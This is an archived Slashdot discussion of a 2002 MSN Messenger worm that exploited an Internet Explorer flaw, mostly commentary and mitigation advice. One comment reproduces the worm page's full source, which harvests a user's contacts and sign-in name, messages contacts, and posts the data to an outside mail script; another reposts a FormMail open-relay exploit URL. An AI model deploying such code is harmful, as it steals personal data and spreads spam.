Slashdot Mirror
Microsoft Instant Messenger Virus Sweeps Net
Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.
There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.
Sophistication: moderate. Damage: only your pride.
Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.
Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?
because I was using the linux version of Microsoft Messenger!
If the entire population of slashdot accessing that site to point and laugh at the exploit code and how it doesnt affect them doesnt constitute a slashdotting, I dunno what does =) I already cant access it.
;)
Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em
With a name like Warhol, obviously this isn't a virus, it's a form of art.
iF yOuR fRiEnDs SeNd YoU mEsSaGeS fOrMaTtEd LiKe ThIs, YoU nEeD tO fInD nEw FrIeNdS!!!11
I assume this only affects the MSN client from Microsoft... correct? Or does this also affect other clients that can use the MSN network, like Trillian? If it is just a link to some virus code on a website, it would affect Trillian (because it actually doesn't propagate through the instant messaging program)... but if it is something that gets triggered inside MSN Instant Messenger, then Trillian users are safe...
Mark
I for one, am not shocked at all :)
Anyone who is shocked is a bit of a fool. It was only a matter of time, really, until one of M$'s many security holes in messenger was exploited. Kinda sad to think what will happen in the future as OS becomes more and more integrated with the internet. Your personal data (courtesy of passport) might be spread around if you replied to a IM, or data loss.
Don't use microsoft products, so I am not vulnerable. Happy me.
What's the url for this virus? The link to "Go To http://www.masenko-media.net/cool.html NoW" wasn't clickable. Please fix this, /. admin!
"I have not failed. I've simply found 10,000 ways that won't work." --Thomas Edison
Use Trillian :http://www.trillian.cc. A few people msg me with the link. All that happens in that a blank window pops up. Mind you, i am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html ) is:
8 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
<br><br>
<html>
<head>
<title>Welcome</title>
<Script>
var msnWin;
var msnList;
var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";
function Go(){
msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F7956
focus();
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}
function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}
</Script>
</head>
<body onload="Go()">
<p align="center">
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>
I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.
It worked too. Got to log into MSN as the CTO of our company, just to make a point.
As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.
best web host ever
First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.
Install the patch and be done with it.
the register had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P
I get this message from this girl I kindof like on MSN saying to go to this URL urgently. So I do (duh!). Turns out it is a porn site.. So I'm thinking what is this girl saying? Is she dropping some no so subtle hints? As I ponder this I get a MSN message from my mom asking me why I sent her a link to a porn site.. then I understood..
The worm seems to be named because of a quote that the site attributes to Andy Warhol.(ie. 'in the future everyone will have his 15 minutes of fame.') That quote should actually be attributed to Marshal MacLuhan, who Andy ripped it off from. So these worms should be name MacLuhan worms.
Damnit, Jim, I'm an anarchist, not a F@#$!^& doctor!
The page appears to post a hidden form with your email information to the page. I suspect that it may be a contact gatherer for spammers (a new low...) though it could have done much more.
FormMail.pl is the perl script which recieves this information. It is pretty interesting...
LedgerSMB: Open source Accounting/ERP
>> Why can't one single week go by without a big annoying MSFT bug / virus being exposed?
:) which is more tempting a target.
The media loves that crap. They descend on it like a shark smelling blood. Any other product could have worse bugs, and they would be all Ho Hum, but a MS bug/virus? whooo boy, feeding frenzy!!
Also, because the people who write the Virii target MS (it might just be easier too.) because of the LARGE install base of it. You can write a Linux virus, and it nails like 100 people, but you could write the same bug targeting MS products, and you can nail 100,000! You do the math.
No system is 100% secure. Period, end of story.
MS products in general, are like swiss fricking cheese though. My big complaint is the "Turn It on By default" attitude of MS Products. I had the Messenger on my system, and after adding a couple of co-workers, never used it. I got nailed by the bug today, and was quite annoyed by it. Fortunatly, the payload is non destructive, or I would have been PISSED. Leave it off by default, and IF i want it, I'll turn it on.
badger
I've been reluctant to use the MS IM client because it didn't appear they had fully integrated it's virus abilities with all their other software. Now that it's part of a fully integrated Microsoft Virus Productivity Suite, I'm ready!
Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?
- Microsoft Instant Messenger Virus Sweeps Net
- What is
.NET?
- States Demand Windows Source Code
- Details of MSFT's Antitrust Lobbying
There were none yesterday, or the day before... the calm before the storm...Just go to the registrar www.godaddy.com:
MASENKO-MEDIA.NET WHOIS results:
The data contained in Go Daddy Software, Inc.'s WHOIS database,while believed by the company to be reliable, is provided "as is"with no guarantee or warranties regarding its accuracy. Thisinformation is provided for the sole purpose of assisting youin obtaining information about domain name registration records.Any use of this data for any other purpose, including, but notlimited to, allowing or making possible dissemination orcollection of this data in part or in its entirety for anypurpose, such as the transmission of unsolicited advertising andsolicitations, is expressly forbidden without the prior writtenpermission of Go Daddy Software, Inc. By submitting an inquiry,you agree to these terms of usage and limitations of warranty.Registrant: Net Crater NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States Registrar: Go Daddy Software (http://registrar.godaddy.com) Domain Name: MASENKO-MEDIA.NET Created on: 06-Feb-02 Expires on: 06-Feb-03 Last Updated on: 06-Feb-02 Administrative Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Technical Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Domain servers in listed order: NS1.NETCRATER.COM NS2.NETCRATER.COM
until someone unleashes a virus that does some serious damage. If I was a "terrorist" hell bent on punishing the Western world for whatever percieved sins, I'd be learning how to make, or hiring programmers, to unleash a truely destructive virus.
It's been said many times before, but I'll say it again, any monoculture is far more vulnerable to attack than a diverse system. Relying on one system, be it Microsoft or even Linux, is foolish.
The destruction of the Microsoft monopoly is not just a matter of helping improve competition, it is a serious security matter. No amount of campaign donations or legal semantics should distract the government from its task of providing security.
* * Always question "the National Interest" - 9 times out of 10 it is a cover for evil
Uh, so people can download the patch before they get the virus, maybe?
just gave it a go, and it didn't affect me. running winxp with netcaptor browser (embeds ie) and trillian (im client that connects to the msn messanger network among others)
not that i was expecting it to work.
what amuses me though, is how the linked page from this article reads like a very handy worm writing primer, suggesting better propogation methods -
Optimized scanning routines, hitlist scanning, and permutation scanning can be combined to produce hyper virulent Warhol Worms. Since they are so fast, such worms would be the vehicle of choice for delivering malicious payloads to the net at large.
But /. is right, it is a Warhol virus : all the posters who reported this non-news got their 15 minutes of fame on Slashdot.
GET
Host: www.masenko-media.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Win32)
HTTP/1.1 404 Not Found
Date: Thu, 14 Feb 2002 00:07:30 GMT
Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8 PHP/4.0.6 DAV/1.0.2 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>Apache/1.3.20 Server at www.masenko-media.net Port 80</ADDRESS>
</BODY></HTML>
(No Micros**t anywhere on these machines. Cheers!)
Unlimited growth == Cancer.
You might try just the domain name. Which comes out to:
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM
Looks fine to me..:)
BWP
The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.
Don't believe me? check out the IIS curve at Netcraft . What happened after Nimda and Code Red? IIS usage INCREASED.
Mebbe I'm just bitter cos I'vre been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)
Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.
Yes, but guess what M$ have decided to make a compulsory add-on to windows XP. Yep, that's right, Messenger. I can just wait for the argument as to why "messenger is an essential part of windows".
Just an FYI about the lack of security on older versions of formmail.pl You should replace the exploitable version, if you are using it yourself.
% 20send%20anonymous%20spam.
Formmail.pl Can Be Used As An Open Mail Relay
Summary
The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
This vulnerability has already been exploit by spammers in many installations of Formmail.pl.
Details
Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program two distribute their email (SPAM).
Exploit:
A URL such as the following:
http://www.example.com/cgi-bin/FormMail.pl? recipient=email@address-to-spam.com&message= Proof%20that%20FormMail.pl%20can%20be%20used%20to
Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.
Workaround:
1. Remove your formmail.pl script until the author provides a fix.
or:
2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.
--It's Pimptastic!--
Somebody mod this parent as "funny", or "underated" because the authore has a point, the slashdot effect should sufic to kill any of the infection sites, and with a high degree of impact.
It isn't a lie if you belive it.
"Go To http://www.goatse.cx NoW !!!"
Imagine if your friends suddenly knew not only that you were gullible enough to fall for a virus like that, but that you had seen that site...
I know that formmail.pl has some vulnerabilities, and figured people were just probing me.
This would explain where it is coming from. Add this to the code red etc that my poor little web server on DSL has to deal with
According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )
"None are more hopelessly enslaved than those who falsely believe they are free." -- Goethe
Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAffee.
;)
I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?
Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propogating, though, in that it requires the server-side in order to be malicious, or do anything at all.
That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.
-l
P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company.
Look closely:
...
<input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">
I think somebody forgot that HTML source can be viewed
The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.
--
If code was hard to write, it should be hard to read
I just copied and pasted part of this story into an outlook email and sent it to our staff warning them of the problem. The address to the masenko-media site came out as a URL. I wonder how many users will click it?
The race isn't always to the swift... but that's the way to bet!
People keep going on (posting here that is) as if this is some sort of sensationalization of Microsoft security issues. As if other media outlets jump on Microsoft like vultures. Well, wake up, they don't (imho). The 'straight' media tends to avoid bad business news, especially given the danger of being sued by the most politically powerful, media powerful, and just plain rich powerful, software company around. Hmmm, AOL/Time don't count right?
Just because it's the latest #@#k up from Microsoft doesn't deminish it's importance as news.
How many times have I shocked an Internet user (years of tech support, I'm so bitter!) by exploiting IExploder sillyness and effectively crack the lusers OS? They were none to pleased, I have to say. It's not like I can even code really, I'm a moron with programming. But if I can do it...
And it's better to find out about these things in the news, not the hard way!
"A fully coordinated worm, where the worms explicitly coordinate their attack on the network, is a theoretical possibility but has not been seen in practice due to the difficulty in coding and coordinating the worms."
/. some time ago about the impossibility of removing viruses from a computer network without shutting the network down under certain conditions.
Obviously the author has not heard of the interpreted, functional programming language Erlang. It can be best described as "The Borg" and has language level support for things like automatic resource discovery, live updates of software modules and distributed databases. There are binaries available for many architectures.
An attack platform written in this language has the potential to be utterly devastating. Imagine, all of the infected nodes know about all of the other nodes. You have a distributed database containing information on exploits and probes for various computer systems that can be updated on the fly as new exploits are discovered. Even the code for the platform itself can be updated while the system is running.
As I recall, there was a story on
Why hasn't this happened yet? It surely isn't for lack of expertise. No need to worry though, all the legislation that's been passed regarding computer crime prevents this sort of thing, right?!
I guess they will need the whole month to 'focus on security'. Good thing they budgeted so much time.
Kind thoughts do not change the world
(Prof. Nutbutter / Tales from the Punchbowl)
--
The Cap is nigh. Time to get a fresh new account.
Isn't it possible that the virus itself flooded the website with many hits to it coming from just instant messenger? :)
:)
Plus, since the topic author knew the exact URL from somewhere, it must have already been fairly widespread before it got here
Cover your eyes and click this link!
Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.
It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.
For those who are interested, a more formal analysis is available Here, a paper I submitted to Usenix Security on the subject.
Test your net with Netalyzr
...are aware of the seriousness of their acts.
Don't they know that virus making will soon be considered a hate crime?
On another note, I wonder how many victims of the Warhol virus also caught this recent virus.
When faced with a problem, many web developers say "I know, I'll use JavaScript!".
Now they have two problems.
The "Don't Fucking Open Me!" virus is still spreading havoc.
E-mail inboxes were flooded with messages this morning as a new virus quickly spread around the world. Dubbed "Don't Fucking Open Me" by anti-virus researchers, the infected e-mail follows a similar course to other viruses and replicates by sending itself out to everyone in the infected computer's Outlook and Outlook Express address book. The virus also contains two different payloads: one version formats the hard drive and displays the message "This is for your own good"; the other payload creates random Power Point presentations in the "My Documents" folder.
Savvy users can spot the virus by its subject which is "Don't Fucking Open Me" or by the attachment which is entitled "Don't_Fucking_Open_Me.exe".
"This virus tricks the user with an old psychological tactic called reverse psychology. Apparently the curiosity created by the message has been too much for thousands of users," said anti-virus researcher Bob Atibop. According to Atibop, this isn't the first time reverse psychology has been used. In 1998, the "Don't Pee on Your Keyboard" worm caused a flood of damage.
Researchers have seen large infection among AOL users and middle managers, the two largest concentrations of naive and inept computer users.
Claudia Hawkins who was infected by the virus said, "My son told me not to open attachments, but.... I mean my MOM sent it! What if she was hurt?!?"
Another infected user too embarrassed to reveal his name said, "I thought that there was no way that this could be a virus. What kind of stupid idiot virus writer would put a dumb title on it like that? No one would ever open something that says not to open it. The virus would never spread defeating the whole purpose of it."
Experts advise extreme caution when opening messages entitled "Don't Fucking Open Me" or "Click Here for Cash and Virus Infection".
--Metrollica
Well, there has been a couple of well known "features" for some time. All you needed was to insert some code on your site and you could see who visited you on the site and who their "Friends" were. on all sites this was only their Messenger name, including the ones on your contact list.
Then there is some hardcoded urls into Messenger that allow certain sites obtain your email adr. and the emails adr. of the people in your contact list. thise sites include microsoft.com, hotmail.com.
Hmm thinking about whipping up an example on my website,, heh could be fun.
Before, i was convinced that Microsoft's obsession with closed source was an evil plan to allow them to hide malicious code in Windows so they could take over computers/internet/world. Now i have come to realise, that the real reason is because they are so incompetent that they don't want anyone to see the crap, uncommented, un-nested, spaghetti code that they call software, for risk of other corporations laughing at them, like a lecturer laughs at the bottom-of-the-class student who submits their half-assed assignment code that looks like a 3-year old wrote it (i'm sure many 3 year olds could actually write decent code :) If anyone witnessed what was really in the operating system their business was relying on, they would rather have BBC BASIC (oh, wait, VB _is_ BASIC rofl :)
Now i have realised that Microsoft couldn't plant code in Windows to take over the world, because they can't code, and are too busy writing software that will try to stop your computer working if you change more than 5 bits of hardware.
This comment does not represent the views or opinions of the user.
I just visited my friend's brother to pick up a used telescope. His brother's system is down because he clicked on a link in an email that said something like "pictures of me naked."
When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"
Didn't know what to say to that.
"Hardly used" will not fetch you a better price for your brain.
Why the hell does it take Microsoft so long to get patches onto Windows Update, which most users use to get their updates (those that look)?
Like, when I heard about the SNMP problem yesterday, I went to rhn.redhat.com, found an update for snmp, did a select all for all my linux boxes i adminster at work, scheduled them to be updated, done. I got look for an SNMP update for my Windows servers, none found.
It's just annoying... Microsoft has billions for R&D, takes weeks to get a patch out on Windows update, yet some kid can write autorpm that does the same kinda thing for linux in his spare time...
I hate Microsoft, but my favourite part isn't this story. My favourite part is the link directly under it.
.NET? | Linus Merges ALSA Into 2.5.4 >
< What is
You gotcher answer, folks.
--------
Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...
A quick Google search for "risks digest eye surgery" yields this link. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.
Yes, but if it was an organized effort directed at the site for the express purpose of bringing it down, the guys at OSDN could be held liable for a DDoS.
they're ActiveX viruses, and will do more than send MSN Messenges to your friends if you're using IE
Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.
Firstly, statistics, even the 'raw' ones provided by Netcraft, can be read with any spin you choose to apply (as you have done)
Secondly, you're not looking at sites that are active, just ones that have a webserver running. This includes about 2/3 of machines that aren't actually active servers. Check the figures yourself. 36.7 million polled, 13-ish million active. The more relevant graph is the second one provided, showing the count and growth of active servers, not just plain numbers of them.
So according to the issue of RISKS Digest, this third-party program called "Ladarvision" kept on throwing very odd error messages internal to the program, and the tech was trained to hit RETURN. How is this Microsoft's fault?
Windows 95 is pretty stable if you use it as a single-tasking OS. I mean, there are still point-of-sale systems running DOS, and that provides just slightly less memory protection than Windows 95 does. Just don't blame the OS vendor for a shoddily-written third-party program.
For more information, click here.
You can delete the references to the Messenger object in the registry. It leaves Messenger unaffected but disables the web object.
1 -0 0C04F795683}
4 -0 000F875C541}
Remove the following registry keys:
HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A44
HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D9
HKEY_CLASSES_ROOT\Messenger.MsgrObject
and there's another Messenger.* object, but I forget what it was... but if you get the CLSIDs that should cover it...
You can just rename them to backup_FB7199AB-79BF-11d2-8D94-0000F875C541 or whatever if you want to be cautious.
You'll need to remove them again if you upgrade or reinstall - it'll put the references back.
Convictions are more dangerous enemies of truth than lies.
- Nietzsche
It's 9:35 pm EST, and Windows Update seems to have fallen off the DNS. Interesting timing, that. Is it just my ISP? Microsoft forget to pay its bills, again? Or is something more sinister at work?
Maybe it's just me, but my inner conspiracy theorist is telling me that someone evil enough to start an IM worm using a patchable exploit could also be evil enough to cut off the first place people would go to look for that patch.
This sig intentionally left blank.
Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?
Was this before or after they investigated the code for security problems per the new order?
I don't get it... why do people whine about this? Just disable Javascript. Everything worthwhile on the web will still work just fine; it'll just go faster and screw you less often. Javascript should be extinct by now: Everyone who uses it hates it, people who turn it off are happier (I have never seen those x10 pop-under ads that everyone talks about), and it doesn't do anything useful. It's all pain with no gain.
Web browsers shouldn't even include it anymore.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
it isn't integrated into anything, even if it comes with the OS
Bzzt yourself. Messenger is integrated with at least Outlook, and I suspect IE 6. (IE can make API calls to Messenger, regardless.) And you have apparently never used XP, where it seemingly pervades the entire system. *shudders*
- fader
The version I got reads
URGENT - Go to http://users.skynet.be/dark.angel/cool.htm
I went, but Mozilla crashed on accessing the site so I wasn't affected. Then I got a clone message, and the evil purpose rapdily became clear. Anyone peaked at this to see if the code is essentially the same?
--
From Phil
> I hate my COBOL! course
Is that the Yahoo! version of COBOL?
I won't do the stupid *bzzt* think..but I think you are misinformed. I have both Outlook 6 (freaking slow piece of carp) and IE 6, and I have NO MSN messanger or Microsoft Messanger or anything. I've never really used it. *shrug* I'm running Windows 98...so that might have to do with why it isn't integrated.
The anti-salmon
-
Device failures:
Note that most of the reported problems are timing related. Medical gear should be using a true real time OS, like QNX, with maximum latency guarantees.Six eyes experienced interruptions during the surgical procedure due to laser system failures: a faulty on/off switch (1); internal timing error (3), double pressing of footswitch by operator (1); and failure to track due to simultaneous activation of tracking and printing (1).
little did the visitors of Slashdot.org know, they were unwitting participants in the world's first human-powered smurf attack experiment.
Just raise the taxes on crack.
What does a server side Perl thing have to do with an MSN bug? Is this thing attacking vulnerable web servers to propagate it's malicious Jscript?
Intresting.
autopr0n is like, down and stuff.
Just one (well, two) minor caveats, if you don't mind. :) :)
To start with, Trillian doesn't support the Jabber protocol. That is annoying (Jabber rocks, dontcha know).
Second problem, Trillian knows nothing of \n carriage returns. It means that, if a friend using, say, licq or some Jabber implementation on Linux/*BSD/whatever sends you a message, the carriage returns won't be displayed properly. That's pretty annoying -- such messages will generally become very hard to read. I notified the dev team about this bug, but they never deemed necessary to answer my email. Oh well, I guess I'll stick with Jabber.
-- B.
This sig does in fact not have the property it claims not to have.
... this happens right smack dab in the middle of Microsoft's self-proclaimed Focus on Security Month.
Here are 2.
1.) If you don't use Windows
2.) You use some of the special features that the official client has but trillian does not.
What a sucky virus! They shoulda had it popping up porn sites in separate windows...just what the unsuspecting doofus needs when the boss walks in...
You're using her as bait, Master!
Hmm.
Is that net or (dot)NET?
Bold prediction : same (dot)NET slashdot story , 2 years from now.
You are in a twisty maze of processor lines, all alike.
There is a lot of hype here.
...a 'popular' Microsoft product that hasn't had virus capability? Word, Excel, Outlook, Outlook Express, countless Windows 3.1 thru 2000, hell, XP is a honey pot OS just by connecting it to a network. My point being, why is this news? Anything you run with M$ in the About box will at some point destroy one or more aspects of your computer, be it the hard drive, cpu, network connection, etc. Today it's the IM. Tomorrow it'll be the icon editor...
Any connection between your reality and mine is purely coincidental.
Saw the TV show too. Cool.
Unlimited growth == Cancer.
We did so as to attempt to put pressure on Microsoft to patch several major holes in Internet Explorer - the one we exploited (document.open) took MS exactly fifty four days to make a patch from, from it being publicly disclosed.
We felt this was pathetic, and the public had a right to know what Microsoft's bad programming could cause - none of the previous examples of the document.open hole had shown to what extent this could be exploited.
This new worm, although harmless, is a direct rip of the example code from our bulletin, modified to also e-mail the contact list and MSN sing-in name to an e-mail address.
As long as Microsoft continues to support the flawed security model of ActiveX, integrating products together this closely, such things will continue to happen.
The next MSN worm might be far worse.
Please, please all Internet Explorer users patch your systems now. If you are using IE5.0 or lower, MS haven't produced a patch for you - they clearly care more about their product lifecycles than customer's security. I strongly suggest upgrading to 5.5 or 6, failing that disable active scripting.
I'm also interested as to why Slashdot felt the need to approve this article about a worm, as several people submitted stories about my original MSN exploit example. Oh well, guess you need things in the wild before telling people?
Well, I tried the Register demostration page, and I only got this:
"Sorry, there was an error in the script.
This may well be due to your IE security settings - try resetting them to default and trying again.
..."
IE6 is much better when it comes to security and privacy than IE5.
What pisses me off about this is that Microsoft is the one who makes all the money from this, yet I am the one who has to clean up my friends computers every third Tuesday for them, because MSN allows any program (or indeed website, it's used on the msn portal pages) to access it's internal objects via COM. Not that there is anything wrong with this idea, but due to their lax coding, it's people like me who get to pick up the pieces.
As I access MSN via Jabber I can't be infected with these viruses anyway, but the fact that MSN isn't even a particularly great chat program especially rankles.
I don't get all of you pro-Internet Explorer folks. Is it not blatantly obvious that this shit is put into the browser intentionally? You don't see Opera or Mozilla getting patched for these types for things...
And yet... People stil use IExploder cause it is convenient.
Is anyone else finding a coincidence here that this follows a story entitled "what is .NET?"? I think we now know :-)
There is no reasonable defense against an idiot with an agenda
:wq
Yep, I did this, too. However, I noticed that when I run CNET's CatchUp scan, it picks up a MSN Messenger DLL still on my hard drive. I'm kind of afraid to delete it. I wonder if anything else is using it or if there still exists some kind of security risk with it being there?